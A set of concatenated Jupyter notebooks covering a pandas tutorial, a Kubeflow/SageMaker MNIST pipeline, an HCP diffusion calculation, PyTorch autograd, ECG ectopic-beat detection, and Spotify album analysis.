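df = pd.DataFrame(data)
print(df.shape)  # (2, 3)
```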
# + id="WDQb9AnKD1BH" colab_type="code" colab={}
# + id="-2-jGvmGD1BI" colab_type="code" colab={}
# + id="2kbyOThiD1BJ" colab_type="code" colab={}
# + [markdown] id="pJK2tQgYD1BK" colab_type="text"
# ### Creating a DataFrame from a dictionary
# + id="WKNQwKucD1BK" colab_type="code" colab={}
dados = {
'Nome': ['Jetta Variant', 'Passat', 'Crossfox'],
'Motor': ['Motor 4.0 Turbo', 'Motor Diesel', 'Motor Diesel V8'],
'Ano': [2003, 1991, 1990],
'Quilometragem': [44410.0, 5712.0, 37123.0],
'Zero_km': [False, False, False],
'Valor': [88078.64, 106161.94, 72832.16]
}
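# A sketch using a shortened version of the dictionary above; the optional `columns` argument fixes the column order:

```python
import pandas as pd

# Each key becomes a column; the lists must all have the same length
data = {
    'Nome': ['Jetta Variant', 'Passat', 'Crossfox'],
    'Ano': [2003, 1991, 1990],
}
df = pd.DataFrame(data, columns=['Nome', 'Ano'])
print(df.shape)  # (3, 2)
```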
# + id="lKnuZfzcD1BK" colab_type="code" colab={}
# + id="PNqTytC-D1BL" colab_type="code" colab={}
# + [markdown] id="fCCXs0reD1BL" colab_type="text"
# ### Creating a DataFrame from an external file
# + id="78PRHGeZD1BL" colab_type="code" colab={}
# + id="1o1YlnVPD1BM" colab_type="code" colab={}
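# A sketch of reading CSV data with `pd.read_csv`. The actual course file is not shown here, so an in-memory string stands in for the external file, and a `';'` separator is assumed for illustration:

```python
import io
import pandas as pd

# Stand-in for an external CSV file; a ';' separator is assumed here
csv_text = "Nome;Ano\nJetta Variant;2003\nPassat;1991\n"
dataset = pd.read_csv(io.StringIO(csv_text), sep=';')
print(dataset.shape)  # (2, 2)
```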
# + [markdown] id="y5V-1AK-D1BN" colab_type="text"
# # 5.2 Selections with DataFrames
# + [markdown] id="wZjqlHe9D1BN" colab_type="text"
# ### Selecting columns
# + id="gM3LbtzlD1BN" colab_type="code" colab={}
# + id="R2FWgCM_D1BO" colab_type="code" colab={}
# + id="lCCumsxsD1BP" colab_type="code" colab={}
# + id="zxlyC3B8D1BP" colab_type="code" colab={}
# + [markdown] id="7RPXPm1XD1BQ" colab_type="text"
# ### Selecting rows - [ i : j ]
#
# <font color=red>**Note:**</font> Indexing is zero-based, and in slices the row with index i is **included** while the row with index j is **not included** in the result.
# + id="PdDUwPw3D1BQ" colab_type="code" colab={}
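# A minimal sketch of the slicing rule above (the data is illustrative):

```python
import pandas as pd

df = pd.DataFrame({'Nome': ['Jetta Variant', 'Passat', 'Crossfox'],
                   'Ano': [2003, 1991, 1990]})
# Rows with index 0 and 1 are included; the row with index 2 is not
print(df[0:2])
```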
# + [markdown] id="G3DMSk97D1BR" colab_type="text"
# ### Using .loc for selections
#
# <font color=red>**Note:**</font> Selects a group of rows and columns by their labels or by a boolean array.
# + id="Ftg-hNOoD1BR" colab_type="code" colab={}
# + id="xdxkDrHvD1BS" colab_type="code" colab={}
# + id="pMN3U1KjD1BS" colab_type="code" colab={}
# + id="oOEO72uZD1BT" colab_type="code" colab={}
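# A sketch of label-based selection with `.loc`, using illustrative car names as the row index:

```python
import pandas as pd

df = pd.DataFrame({'Motor': ['Motor 4.0 Turbo', 'Motor Diesel'],
                   'Ano': [2003, 1991]},
                  index=['Jetta Variant', 'Passat'])
# Label-based selection: row label first, then column label
print(df.loc['Passat', 'Ano'])  # 1991
```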
# + [markdown] id="SYKEe3vCD1BT" colab_type="text"
# ### Using .iloc for selections
#
# <font color=red>**Note:**</font> Selects by integer position, i.e., based on where the data is located rather than on labels.
# + id="U4Bru90bD1BT" colab_type="code" colab={}
# + id="iLKUyrzND1BU" colab_type="code" colab={}
# + id="KGZpixYUD1BU" colab_type="code" colab={}
# + id="GxdqIz4LD1BV" colab_type="code" colab={}
# + id="AVIhs7uLD1BW" colab_type="code" colab={}
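# A sketch of position-based selection with `.iloc` (the data is illustrative):

```python
import pandas as pd

df = pd.DataFrame({'Nome': ['Jetta Variant', 'Passat', 'Crossfox'],
                   'Ano': [2003, 1991, 1990]})
# Position-based selection: rows 0 and 1 of the first column
print(df.iloc[0:2, 0].tolist())  # ['Jetta Variant', 'Passat']
```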
# + [markdown] id="eAbwq1oLD1BW" colab_type="text"
# # 5.3 Queries with DataFrames
# + id="AOZTWzehD1BW" colab_type="code" colab={}
# + id="rO5T4h94D1BX" colab_type="code" colab={}
# + id="STZ-l8oaD1BX" colab_type="code" colab={}
# + id="OZC8NAn6D1BX" colab_type="code" colab={}
# + id="OzXC2M40D1BY" colab_type="code" colab={}
# + [markdown] id="_XKXcWO-D1BY" colab_type="text"
# ### Using the query method
# + id="AB9JirSoD1BY" colab_type="code" colab={}
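# A sketch of `DataFrame.query`, which filters rows with a boolean expression written over column names (the data is illustrative):

```python
import pandas as pd

df = pd.DataFrame({'Ano': [2003, 1991, 1990],
                   'Zero_km': [False, False, True]})
# Boolean expression over column names, evaluated row by row
recent = df.query('Ano > 1991 and Zero_km == False')
print(len(recent))  # 1
```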
# + [markdown] id="ciJ4dw_FD1BZ" colab_type="text"
# # 5.4 Iterating over DataFrames
# + id="TKAB-g5KD1BZ" colab_type="code" colab={}
# + id="eFTNtPRWD1Ba" colab_type="code" colab={}
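# A minimal sketch of row-wise iteration with `iterrows` (the data is illustrative):

```python
import pandas as pd

df = pd.DataFrame({'Nome': ['Jetta Variant', 'Passat'],
                   'Ano': [2003, 1991]})
# iterrows yields (index, row-as-Series) pairs
for index, row in df.iterrows():
    print(index, row['Nome'], row['Ano'])
```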
# + [markdown] id="HnUzHFQPD1Ba" colab_type="text"
# # 5.5 Data cleaning
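# A minimal sketch of common cleaning steps on hypothetical data (the column names follow the car dataset used above; the missing-value rule is illustrative):

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'Quilometragem': [44410.0, np.nan, 37123.0],
                   'Zero_km': [False, True, False]})
# Zero-km cars have no mileage recorded, so fill those NaNs with 0
df.loc[df['Zero_km'], 'Quilometragem'] = 0
# Drop any rows that still have missing mileage
df = df.dropna(subset=['Quilometragem'])
print(df['Quilometragem'].tolist())  # [44410.0, 0.0, 37123.0]
```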
# + id="FRxBWoBGD1Ba" colab_type="code" colab={}
# + id="HHSwH0ZaD1Bc" colab_type="code" colab={}
# + id="G27pxgZ5D1Bd" colab_type="code" colab={}
# + id="DhlRbxy2D1Bd" colab_type="code" colab={}
# + id="OL04QU5RD1Be" colab_type="code" colab={}
# + id="fTH2JkGDD1Bf" colab_type="code" colab={}
# + id="lure2GvpD1Bg" colab_type="code" colab={}
# + id="4-ZvhXjvD1Bj" colab_type="code" colab={}
# + id="MQUw7i1OD1Bk" colab_type="code" colab={}
# + id="U4Cse7miD1Bl" colab_type="code" colab={}
# + id="8L4wum05D1Bl" colab_type="code" colab={}
# + id="8iLOc-U3D1Bm" colab_type="code" colab={}
| 5_Semana-Python_para_Data_Science/Python_para_Data_Science_Pandas.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Mnist classification pipeline using Sagemaker
#
# The `mnist-classification-pipeline.py` sample runs a pipeline that trains a classification model on the MNIST dataset using K-means on SageMaker.
# All required steps are included here; for other details, such as how to get the source data, please check the [documentation](https://github.com/kubeflow/pipelines/tree/master/samples/contrib/aws-samples/mnist-kmeans-sagemaker).
#
#
# This sample is based on the [Train a Model with a Built-in Algorithm and Deploy it](https://docs.aws.amazon.com/sagemaker/latest/dg/ex1.html).
#
# The sample trains and deploys a model based on the [MNIST dataset](http://www.deeplearning.net/tutorial/gettingstarted.html).
#
#
# ## Prerequisite
# 1. Create an S3 bucket to store pipeline data
#
# > Note: Be sure to change the HASH variable to a random hash and set AWS_REGION before running the next cell
#
# > Note: If you use us-east-1, please use the command `!aws s3 mb s3://$S3_BUCKET --region $AWS_REGION --endpoint-url https://s3.us-east-1.amazonaws.com`
HASH = 'abc123'
AWS_REGION = 'us-west-2'
S3_BUCKET = '{}-kubeflow-pipeline-data'.format(HASH)
# !aws s3 mb s3://$S3_BUCKET --region $AWS_REGION
# 2. Copy dataset
#
# > Copy `data` and `valid_data.csv` into your S3 bucket.
# +
# !aws s3 cp s3://kubeflow-pipeline-data/mnist_kmeans_example/data s3://$S3_BUCKET/mnist_kmeans_example/data
# !aws s3 cp s3://kubeflow-pipeline-data/mnist_kmeans_example/input/valid_data.csv s3://$S3_BUCKET/mnist_kmeans_example/input/
# -
# 3. Grant SageMaker permission
# > Typically in a production environment, you would assign fine-grained permissions depending on the nature of the actions you take and leverage tools like [IAM Roles for Service Accounts](https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html) to secure access to AWS resources, but for simplicity we will assign the AmazonSageMakerFullAccess IAM policy. You can read more about granular policies [here](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html)
#
# > In order to run this pipeline, we need two levels of IAM permissions
#
# > a) Create a Kubernetes secret **aws-secret** containing your AWS credentials for SageMaker. Please make sure to create `aws-secret` in the kubeflow namespace.
#
# ```yaml
# apiVersion: v1
# kind: Secret
# metadata:
# name: aws-secret
# namespace: kubeflow
# type: Opaque
# data:
# AWS_ACCESS_KEY_ID: YOUR_BASE64_ACCESS_KEY
# AWS_SECRET_ACCESS_KEY: YOUR_BASE64_SECRET_ACCESS
# ```
# > Note: To get base64 string, try `echo -n $AWS_ACCESS_KEY_ID | base64`
#
# > b) Create an IAM execution role for SageMaker so that the job can assume this role to perform SageMaker actions. Make a note of this role's ARN, as you will need it during the pipeline creation step.
#
# 4. Install Kubeflow Pipelines SDK
# > You can skip this step if it's already installed. You can validate whether you have the SDK installed by running `!pip show kfp`. This notebook has been tested with the kfp v0.1.29 release.
# +
# !pip install https://storage.googleapis.com/ml-pipeline/release/0.1.29/kfp.tar.gz --upgrade
# !pip show kfp
# -
# ## Build pipeline
# 1. Run the following command to load Kubeflow Pipelines SDK
import kfp
from kfp import components
from kfp import dsl
from kfp.aws import use_aws_secret
# 2. Load reusable sagemaker components.
sagemaker_train_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/train/component.yaml')
sagemaker_model_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/model/component.yaml')
sagemaker_deploy_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/deploy/component.yaml')
sagemaker_batch_transform_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/0ad6c28d32e2e790e6a129b7eb1de8ec59c1d45f/components/aws/sagemaker/batch_transform/component.yaml')
#
#
# 3. Create pipeline.
#
# We will create a training job first. Once the training job is done, it will persist the trained model to S3.
#
# Then a job will be kicked off to create a `Model` manifest in Sagemaker.
#
# With this model, a batch transform job can predict on other datasets, and a prediction service can create an endpoint using it.
#
#
# > Note: remember to pass your **role_arn** to successfully run the job.
#
# > Note: If you use a different region, please replace `us-west-2` with your region.
#
# > Note: ECR Images for k-means algorithm
#
# |Region| ECR Image|
# |------|----------|
# |us-west-1|632365934929.dkr.ecr.us-west-1.amazonaws.com|
# |us-west-2|174872318107.dkr.ecr.us-west-2.amazonaws.com|
# |us-east-1|382416733822.dkr.ecr.us-east-1.amazonaws.com|
# |us-east-2|404615174143.dkr.ecr.us-east-2.amazonaws.com|
# |us-gov-west-1|226302683700.dkr.ecr.us-gov-west-1.amazonaws.com|
# |ap-east-1|286214385809.dkr.ecr.ap-east-1.amazonaws.com|
# |ap-northeast-1|351501993468.dkr.ecr.ap-northeast-1.amazonaws.com|
# |ap-northeast-2|835164637446.dkr.ecr.ap-northeast-2.amazonaws.com|
# |ap-south-1|991648021394.dkr.ecr.ap-south-1.amazonaws.com|
# |ap-southeast-1|475088953585.dkr.ecr.ap-southeast-1.amazonaws.com|
# |ap-southeast-2|712309505854.dkr.ecr.ap-southeast-2.amazonaws.com|
# |ca-central-1|469771592824.dkr.ecr.ca-central-1.amazonaws.com|
# |eu-central-1|664544806723.dkr.ecr.eu-central-1.amazonaws.com|
# |eu-north-1|669576153137.dkr.ecr.eu-north-1.amazonaws.com|
# |eu-west-1|438346466558.dkr.ecr.eu-west-1.amazonaws.com|
# |eu-west-2|644912444149.dkr.ecr.eu-west-2.amazonaws.com|
# |eu-west-3|749696950732.dkr.ecr.eu-west-3.amazonaws.com|
# |me-south-1|249704162688.dkr.ecr.me-south-1.amazonaws.com|
# |sa-east-1|855470959533.dkr.ecr.sa-east-1.amazonaws.com|
# +
# Configure your s3 bucket.
S3_BUCKET = '{}-kubeflow-pipeline-data'.format(HASH)
S3_PIPELINE_PATH='s3://{}/mnist_kmeans_example'.format(S3_BUCKET)
# Configure your Sagemaker execution role.
SAGEMAKER_ROLE_ARN='<your_sagemaker_role>'
@dsl.pipeline(
name='MNIST Classification pipeline',
description='MNIST Classification using KMEANS in SageMaker'
)
def mnist_classification(region='us-west-2',
image='174872318107.dkr.ecr.us-west-2.amazonaws.com/kmeans:1',
dataset_path=S3_PIPELINE_PATH + '/data',
instance_type='ml.c4.8xlarge',
instance_count='2',
volume_size='50',
model_output_path=S3_PIPELINE_PATH + '/model',
batch_transform_input=S3_PIPELINE_PATH + '/input',
batch_transform_ouput=S3_PIPELINE_PATH + '/output',
role_arn=SAGEMAKER_ROLE_ARN
):
training = sagemaker_train_op(
region=region,
image=image,
instance_type=instance_type,
instance_count=instance_count,
volume_size=volume_size,
dataset_path=dataset_path,
model_artifact_path=model_output_path,
role=role_arn,
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
create_model = sagemaker_model_op(
region=region,
image=image,
model_artifact_url=training.outputs['model_artifact_url'],
model_name=training.outputs['job_name'],
role=role_arn
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
prediction = sagemaker_deploy_op(
region=region,
model_name=create_model.output
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
batch_transform = sagemaker_batch_transform_op(
region=region,
model_name=create_model.output,
input_location=batch_transform_input,
output_location=batch_transform_ouput
).apply(use_aws_secret('aws-secret', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'))
# -
# 4. Compile your pipeline
kfp.compiler.Compiler().compile(mnist_classification, 'mnist-classification-pipeline.zip')
# 5. Deploy your pipeline
client = kfp.Client()
aws_experiment = client.create_experiment(name='aws')
my_run = client.run_pipeline(aws_experiment.id, 'mnist-classification-pipeline',
'mnist-classification-pipeline.zip')
# ## Prediction
#
# Open the SageMaker console and find your endpoint name. Please check the dataset section to see how `train_set` is obtained.
#
# Once your pipeline is done, find the SageMaker endpoint name and replace the `ENDPOINT_NAME` value below with your newly created endpoint name.
#
#
# > Note: make sure to attach `sagemaker:InvokeEndpoint` to the worker node nodegroup that is running this jupyter notebook.
#
# ```json
# {
# "Version": "2012-10-17",
# "Statement": [
# {
# "Effect": "Allow",
# "Action": [
# "sagemaker:InvokeEndpoint"
# ],
# "Resource": "*"
# }
# ]
# }
#
# ```
#
# !pip install boto3 --user
# ## Find your Endpoint name in AWS Console
#
# Open the AWS console, go to the SageMaker service, and find the endpoint name as the following picture shows.
#
# 
# +
import pickle, gzip, numpy, urllib.request, json
from urllib.parse import urlparse
import json
import io
import boto3
# Replace the endpoint name with yours.
ENDPOINT_NAME='Endpoint-20190916223205-Y635'
# Load the dataset
urllib.request.urlretrieve("http://deeplearning.net/data/mnist/mnist.pkl.gz", "mnist.pkl.gz")
with gzip.open('mnist.pkl.gz', 'rb') as f:
train_set, valid_set, test_set = pickle.load(f, encoding='latin1')
# Simple function to create a csv from our numpy array
def np2csv(arr):
csv = io.BytesIO()
numpy.savetxt(csv, arr, delimiter=',', fmt='%g')
return csv.getvalue().decode().rstrip()
runtime = boto3.Session(region_name='us-west-2').client('sagemaker-runtime')
payload = np2csv(train_set[0][30:31])
response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,
ContentType='text/csv',
Body=payload)
result = json.loads(response['Body'].read().decode())
print(result)
# -
# ## Clean up
#
# Go to the SageMaker console and delete the `endpoint` and `model`.
# ### Clean up S3 bucket
# Delete S3 bucket that was created for this exercise
# !aws s3 rb s3://$S3_BUCKET --force
| sagemaker-kubeflow-pipeline/02_Kubeflow_Pipeline_SageMaker.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # HCP tracer calculation
# What follows is the calculation of the tracer correlation for an HCP crystal (ideal $c/a = \sqrt{8/3}$, $a_0 = 1$, and $\nu = 1$, all for convenience).
import numpy as np
from onsager import OnsagerCalc
from onsager import crystal
import matplotlib.pyplot as plt
# %matplotlib inline
HCP = crystal.Crystal.HCP(1., chemistry="ideal HCP")
print(HCP)
sitelist = HCP.sitelist(0)
vacancyjumps = HCP.jumpnetwork(0, 1.01)
for jlist in vacancyjumps:
print('---')
for (i,j), dx in jlist:
print(i, '-', j, dx)
HCPdiffuser = OnsagerCalc.VacancyMediated(HCP, 0, sitelist, vacancyjumps, 1)
for state in HCPdiffuser.interactlist():
print(state)
nu0 = 1
dE0 = 1
HCPtracer = {'preV': np.ones(1), 'eneV': np.zeros(1),
'preT0': np.array([nu0, nu0]), 'eneT0': np.array([dE0, dE0])}
HCPtracer.update(HCPdiffuser.maketracerpreene(**HCPtracer))
for k,v in zip(HCPtracer.keys(), HCPtracer.values()): print(k,v)
Lvv, Lss, Lsv, L1vv = HCPdiffuser.Lij(*HCPdiffuser.preene2betafree(1, **HCPtracer))
# Correlation coefficient = $L_\text{ss} / L_\text{sv}$ (as $L_\text{sv} = L_\text{vv}$). Should be very close to the FCC correlation coefficient of 0.78145, for this purely isotropic diffusion case.
np.dot(Lss, np.linalg.inv(Lsv))
print(HCPdiffuser.GFvalues)
print(crystal.yaml.dump(HCPdiffuser.GFvalues))
diffcopy = crystal.yaml.load(crystal.yaml.dump(HCPdiffuser))
diffcopy.Lij(*diffcopy.preene2betafree(1, **HCPtracer))
print(crystal.yaml.dump(HCPtracer))
| examples/HCPtracer.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: learning-physics-3z9zxMLf
# language: python
# name: learning-physics-3z9zxmlf
# ---
# ### Inspiration:
# https://arxiv.org/pdf/1807.10300.pdf
import torch
# Create tensors.
x = torch.tensor(1., requires_grad=True)
w = torch.tensor(2., requires_grad=True)
b = torch.tensor(3., requires_grad=True)
# Build a computational graph.
y = w * x + b # y = 2 * x + 3
# Compute gradients.
y.backward()
# Print out the gradients.
print(x.grad) # x.grad = 2
print(w.grad) # w.grad = 1
print(b.grad) # b.grad = 1
| Untitled.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Ventricular Ectopic Beats Detection
# In this notebook we are going to detect VEBs in an ECG signal using PCA and the Hotelling $T^2$ statistic
import scipy.io as sio
from scipy.spatial.distance import mahalanobis
from matplotlib.mlab import PCA  # note: mlab.PCA was removed in Matplotlib 3.1; use an older Matplotlib or sklearn.decomposition.PCA
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# ## Helper functions
def find(a, func):
return [i for (i, val) in enumerate(a) if func(val)]
# ## Load signal data
# +
mat = sio.loadmat("data/ventricular_ectopic_beats.mat")
signalECG = mat['signalECG'][0]
samplerate = mat['samplerate'][0][0]
rPoints = mat['rPoints'][0]
L = len(signalECG)
# -
# ## Segmentation of QRS-complexes
# +
# Count R-peaks
numberQRS = len(rPoints)
# Segmentation window: 50 ms
steps = int(np.round(samplerate*0.05))
# Define matrix 'QRS' for the segmented QRS complexes
QRS = np.zeros((numberQRS,2*steps+1))
# Segmentation
for k in range(numberQRS):
i = rPoints[k]
QRS[k,:] = signalECG[i-steps:i+steps+1]
# -
# ## PCA
# https://www.clear.rice.edu/comp130/12spring/pca/pca_docs.shtml
result = PCA(QRS)
score = np.sum(result.project(QRS), axis=1)
# ## Classify VEBs with T^2 threshold
# https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.spatial.distance.mahalanobis.html
# +
def mahal(x, y):
covariance_xy = np.cov(x,y, rowvar=0)
inv_covariance_xy = np.linalg.inv(covariance_xy)
xy_mean = np.mean(x),np.mean(y)
x_diff = np.array([x_i - xy_mean[0] for x_i in x])
y_diff = np.array([y_i - xy_mean[1] for y_i in y])
diff_xy = np.transpose([x_diff, y_diff])
md = np.zeros((len(diff_xy)))
for i in range(len(diff_xy)):
md[i] = np.sqrt(np.dot(np.dot(np.transpose(diff_xy[i]),inv_covariance_xy),diff_xy[i]))
return md
# Calculate T^2 in the reduced principal component space
tsqreduced = mahal(score, score)
# Define threshold
thres = 3*np.mean(tsqreduced)
# Thresholding of the T^2 vector of the reduced space
# (copy so that tsqreduced is not modified in place)
thresVec = tsqreduced.copy()
thresVec[thresVec < thres] = 0
# Indices of the detected VEBs
ind = find(thresVec, lambda x: x > 0)
VEBpoints = rPoints[ind]
# -
# ## Plot results
# +
t = np.arange(0,L)/samplerate
plt.figure(figsize=(20, 12))
plt.subplot(2,1,1)
plt.plot(t[0:2*steps+1],QRS.T)
plt.plot(t[0:2*steps+1], np.mean(QRS, axis=0), 'c', linewidth=4)
plt.xlabel('Time (s)')
plt.ylabel('Signal amplitude')
plt.title('Segmented QRS-complexes')
plt.legend(['QRS', 'Average beat'])
# Plot ECG signal with marked R-peaks of normal and ectopic beats
plt.subplot(2,1,2)
plt.plot(t,signalECG)
plt.plot(t[rPoints],signalECG[rPoints],'rs')
plt.plot(t[VEBpoints],signalECG[VEBpoints],'go')
plt.xlabel('Time (s)')
plt.ylabel('Signal amplitude')
plt.title('ECG signal with marked R-peaks of normal beats and VEBs')
plt.legend(['ECG signal', 'R-peaks', 'VEBs'], loc='center left', bbox_to_anchor=(1, 0.5))
plt.plot()
# -
| Ventricular Ectopic Beats Detection.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# # Simulated Communities
#
# Simulated communities are synthetically composed collections of sequences that are intended to resemble sequence collections assembled from natural microbial communities. Simulated communities share some similarities with the simulated reads used for [cross-validation of taxonomy assignment](../cross-validated/index.ipynb), in that they are assembled from reference sequences with known taxonomy annotations. Simulated communities have the added properties that these artificial sequences are present at known abundances and simulate a natural community. While the composition of a simulated community is derived from the observed composition of a natural community, there is an essential difference: because the sequences in a simulated community are drawn from annotated reference sequences, the taxonomic composition of a simulated community is known in advance, whereas that of a natural community is not (and even after taxonomic classification, is still not known with certainty). This makes simulated communities useful for assessing the performance of taxonomy classification and other methods. Given the similarities with the simulated reads used for cross-validated taxonomy assignment, methods should perform fairly similarly on both, but simulated communities give us some idea of how method and parameter configuration affect the observed composition of microbial communities.
#
# Simulated communities have an additional function: to test prior probability training for machine-learning classifiers. Prior probabilities are used by some classification methods to predict the likelihood that a given class label will be observed in a population. Training prior probabilities may improve classification accuracy, particularly in situations when specific taxa are unique to an environment. This is opposed to the use of a uniform prior, which assumes that any class is equally likely to be observed in a given environment. While this is a prudent approach when handling unknown samples, it is a naive approach when handling samples from previously characterized sample types.
#
# ## Contents
# The following notebooks generate, assign taxonomy to, and evaluate simulated communities:
#
# 1) **[Generate simulated communities](./dataset-generation.ipynb)** derived from natural community compositions
#
# 2) **[Assign taxonomy](./taxonomy-assignment.ipynb)** to simulated community sequences.
#
# 3) **[Evaluate classification accuracy](./evaluate-classification-accuracy.ipynb)** of simulated communities.
#
| ipynb/simulated-community/Index.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import requests
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
# %matplotlib inline
import seaborn as sns
import dotenv
import numpy as np
import os
os.getcwd()
os.chdir('C:\\Users\\dwagn\\Desktop')
dotenv.load_dotenv()
CLIENT_ID = os.getenv('spotify-client-id')
CLIENT_SECRET = os.getenv('spotify-client-secret')
os.chdir('C:\\Users\\dwagn\\git\\projects')
# +
AUTH_URL = 'https://accounts.spotify.com/api/token'
auth_response = requests.post(AUTH_URL, {
'grant_type': 'client_credentials',
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
})
# Check the status before extracting the token, so a failed request
# does not raise a KeyError on 'access_token'
if auth_response.status_code == 200:
    print('Success!')
else:
    print('API access rejected')
auth_response_data = auth_response.json()
access_token = auth_response_data['access_token']
headers = {'Authorization': 'Bearer {}'.format(access_token)}
url = 'https://api.spotify.com/v1/'
# +
# # Track ID from the URI
# track_id = '3mfJT8Ae3pME7OmluGNMYF'
# r = requests.get(url + 'audio-features/' + track_id, headers=headers)
# r = r.json()
# r
# +
# Paste artist's share link to get the artist_id
# 'https://open.spotify.com/artist/6py4uFIC7T6RdrZnH6hFYJ?si=EJXirCwjR-2y8iw8oBwYjQ'
while True:
artist_share_url = input('Paste artist spotify share link: ')
if artist_share_url == '':
print('bypassing')
artist_id = ''
break
try:
artist_id = artist_share_url.split('/')[4].split('?')[0]
int(len(artist_id)) > 0
break
except:
print('invalid URL')
print(artist_id)
# +
# artist_id = '6py4uFIC7T6RdrZnH6hFYJ' # Ballyhoo!
artist_id = '41Q0HrwWBtuUkJc7C1Rp6K' # 311
# pull albums
albums = requests.get(url + 'artists/' + artist_id + '/albums',
headers=headers,
params={'include_groups': 'album', 'limit': 50}).json()
# -
album_names_dates = {}
for album in albums['items']:
album_names_dates[album['name']] = album['release_date']
artist_name = requests.get(url + 'artists/' + artist_id, headers=headers).json()['name']
print('Successfully accessed {}'.format(artist_name))
# +
# checks for duplicate albums
# sometimes there are different track names (etc. censored or not) on each album
albs_added = []
to_remove = []
for i in range(len(albums['items'])):
alb_name = albums['items'][i]['name']
if alb_name in albs_added:
to_remove.append(i)
albs_added.append(alb_name)
to_remove
# +
# %%time
track_info = []
repeat_detection = []
iter = 0
for i in albums['items']:
if iter not in to_remove:
r = requests.get(url + 'albums/' + i['id'] + '/tracks',
headers=headers)
tracks = r.json()['items']
for track in tracks:
detailsr = requests.get(url + 'audio-features/' + track['id'], headers=headers).json()
# combine with album info
detailsr.update({
'track_name': track['name'],
'album_name': i['name'],
'album_id': i['id'],
'release_date': i['release_date']
})
track_info.append(detailsr)
print('{} added...'.format(i['name']))
iter += 1
# -
df = pd.DataFrame(track_info)
df.release_date = pd.to_datetime(df.release_date)
df.head()
# +
# double-check for duplicate track values
for name in df.album_name.unique():
track_counts = df[df['album_name'] == name]['track_name'].value_counts()
    if not all(v == 1 for v in track_counts):
print(f'Warning: duplicates in: {name}')
# +
df['release_date'] = pd.to_datetime(df['release_date'])
# move last couple columns to the front
cols = df.columns.tolist()
cols = cols[-4:] + cols[:-4]
df = df[cols]
# -
# Shorten long album names for graphing
for name in df['album_name']:
if len(name) > 25:
short_name = name[0:25]
df = df.replace(name, short_name)
# +
# remove tracks with na values, if any
# can't simply dropna(), since there is an error column of NAs >:(
def removeErrors(dataframe):
    na_tracks = []
    for track in dataframe[~dataframe['error'].isna()]['track_name']:
        na_tracks.append(track)
    print('Removing: ', na_tracks)
    # return the cleaned frame; reassigning the parameter alone would not affect df
    return dataframe[dataframe['error'].isna()].drop('error', axis=1)

if 'error' in df.columns:
    df = removeErrors(df)
# +
df['duration_mins'] = (df['duration_ms']/60000).round(2)
def toMinsSecs(time):
minutes = int(time)
seconds = int((time - minutes) * 60)
if seconds < 10:
seconds = str(seconds).zfill(2) # adds zeros before single seconds
full = '{}:{}'.format(minutes, seconds)
return full
df['duration_full'] = df['duration_mins'].map(lambda x: toMinsSecs(x))
df.head(5)
# +
# subset by album
by_album = df.groupby('album_name').agg({'danceability':'mean',
'energy':'mean',
'loudness':'mean',
'speechiness':'mean',
'acousticness':'mean',
'instrumentalness':'mean',
'liveness':'mean',
'valence':'mean',
'tempo':'mean',
'time_signature':'mean',
'duration_ms':'sum',
'duration_mins':'sum'}) \
.round(3) \
                    .reset_index()
by_album = by_album.rename(columns={'time_signature': 'average_time_signature'})
# +
# remove extra/repeated albums
# for repeat albums, go through and pick shortest album
albs_to_keep = {}
for name in by_album['album_name']:
trim_name = name.split('(')[0].strip()
alb_len = len(df[df['album_name'] == '{}'.format(name)])
print(trim_name,':',alb_len)
for i in albs_to_keep.keys():
if (name[0:5] in i) & (alb_len <= albs_to_keep[i]):
albs_to_keep[i] = 0
albs_to_keep[name] = alb_len
albs_to_keep = {x:y for x,y in albs_to_keep.items() if y != 0}
by_album = by_album[by_album['album_name'].isin(albs_to_keep)].reset_index(drop=True)
# -
plt.figure(figsize=(10,10))
ax = sns.barplot(data=by_album,
x='album_name',
y='duration_mins',
order = by_album.sort_values('duration_mins').album_name)
plt.xlabel("Album", size=15)
plt.ylabel("Duration in Minutes", size=15)
plt.title("Album Lengths for {artist}".format(artist = artist_name), size=18)
ax.set_xticklabels(ax.get_xticklabels(),rotation = 30)
# +
dates = df.release_date.unique()
names = df.album_name.unique()
